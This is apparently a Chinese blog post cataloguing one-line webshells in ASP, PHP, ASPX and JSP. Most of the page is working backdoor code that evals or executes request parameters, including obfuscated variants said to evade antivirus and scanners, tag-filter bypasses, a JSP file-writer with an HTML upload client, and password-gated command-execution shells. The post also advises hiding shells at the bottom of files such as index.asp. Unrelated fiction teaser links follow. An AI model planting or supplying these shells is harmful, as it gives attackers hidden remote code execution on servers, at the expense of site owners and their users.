一句话木马

一句话木马

asp


<%execute(request("kxc"))%>

<%eval request ("pass")%>

<%eval request(chr(35))%>

<%executerequest("YouPass")%>

<%eval(request(“1″)):response.end%>

php


<?php @eval($_POST['pass']);?>

<?php fputs( fopen('xie.php','w')  , '<? php eval($_POST[xie]) ?>' ) ; ?>



  #将当前目录下创建xie.php文件,并且将一句话木马写入xd.php中



<?php

$a=array("assert"=>"XC90");

$b=array_keys($a,'XC90');

declare(ticks=1);

register_tick_function($b[0], $_REQUEST['x']);

?>

aspx


<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"],"unsafe");%>

一句话木马变形

jsp脚本后门

先把下面的代码保存为 one.jsp (该代码的作用是可以在当前目录下生成另外一个指定的文件),然后上传到服务器


<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>

然后将下面的代码保存为 .html 格式的,直接双击本地打开。这是作为客户端去连接我们刚刚上传的one.jsp的


<html><head><title>JSP一句话木马客户端</title></head><div align=center>  <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text>  <br><br><textarea name=t rows=20 cols=120>你要提交到服务器的代码</textarea><br>要保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button οnclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form>  <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>  </textarea>  </div></body>

无回显执行命令

将下面的命令保存为 a.jsp,然后上传到服务器


<%Runtime.getRuntime().exec(request.getParameter("i"));%>

有回显带密码执行命令

将下面的命令保存为 b.jsp,然后上传到服务器


<%

    if("b".equals(request.getParameter("pwd"))){

        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();

        int a = -1;

        byte[] b = new byte[2048];

        out.print("<pre>");

        while((a=in.read(b))!=-1){

            out.println(new String(b));

        }

        out.print("</pre>");

    }

%>

参考

其它


<%eval request("c")%>

<%execute request("c")%>

<%execute(request("c"))%>

<%ExecuteGlobal request("sb")%>

%><%Eval(Request(chr(35)))%><%

<%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>

<%eval(Request.Item["c"],"unsafe");%>

'备份专用

<%eval(request("c")):response.end%>

'无防下载表,有防下载表突破专用一句话

<%execute request("c")%><%<%loop<%:%>

<%<%loop<%:%><%execute request("c")%>

<%execute request("c")<%loop<%:%>

'防杀防扫专用

<%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>

'不用"<,>"

<script language=VBScript runat=server>execute request("c")</script>

<% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.

名字)+'') %>

<script language=vbs runat=server>eval(request("c"))</script>

<script language=vbs runat=server>eval_r(request("c"))</script>

'不用双引号

<%eval request(chr(35))%>

'可以躲过雷客图

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

"request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>

<%dy=request("dy")%><%Eval(dy)%>

'容错代码

if Request("sb")<>"" then ExecuteGlobal request("sb") end if

PHP一句话

<?php eval($_POST1);?>

<?php if(isset($_POST['c'])){eval($_POST['c']);}?>

<?php system($_REQUEST1);?>

<?php ($_=@$_GET1).@$_($_POST1)?>

<?php eval_r($_POST1)?>

<?php @eval_r($_POST1)?>//容错代码

<?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句

<?$_POST['c']($_POST['cc']);?>

<?$_POST['c']($_POST['cc'],$_POST['cc'])?>

<?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>

<?php echo `$_GET['r']` ?>

//绕过<?限制的一句话

<script language="php">@eval_r($_POST[sb])</script>

//绕过<?php ?>限制的一句话

<?=eval($_POST['cmd']);

JSP一句话

<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>

提交客户端

<form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>

ASPX一句话

<script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

普通的php一句话:<?php @eval($_POST['r00ts']);?>

普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%>

aspx突破一流的:

dim da

set fso=server.createobject("scripting.filesystemobject")

path=request("path")

if path<>"" then

data=request("da")

set da=fso.createtextfile(path,true)

da.write data

if err=0 then

Response.Write "yes"

else

Response.Write "no"

end if

err.clear

end if

set da=nothing

set fos=nothing

Response.Write "<form action=" method=post>"

Response.Write "<input type=text name=path>"

Response.Write "<br>"

Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))

Response.Write "<br>"

Response.Write "操作系统为:"&Request.ServerVariables("OS")

Response.Write "<br>"

Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")

Response.Write "<br>"

Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"

Response.Write "<br>"

Response.Write "<input type=submit value=save>"

Response.Write "</form>"

</Script>

ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

PHP防杀放扫 一句话:<?php (])?>

上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如

index.asp里面也是可以的!

因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件

的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>

无防下载表,有防下载表可尝试插入以下语句突破的一句话

<%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>

备份专用<%eval(request(“1″)):response.end%>

asp一句话<%execute(request(“1″))%>

aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y(“add6bb58e139be10″);</script>

可以躲过雷客图的一句话。

<%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)

ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,

requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>

不用双引号的一句话。<%eval request(chr(35))%>

参考

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,937评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,503评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,712评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,668评论 1 276
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,677评论 5 366
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,601评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,975评论 3 396
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,637评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,881评论 1 298
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,621评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,710评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,387评论 4 319
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,971评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,947评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,189评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 44,805评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,449评论 2 342

推荐阅读更多精彩内容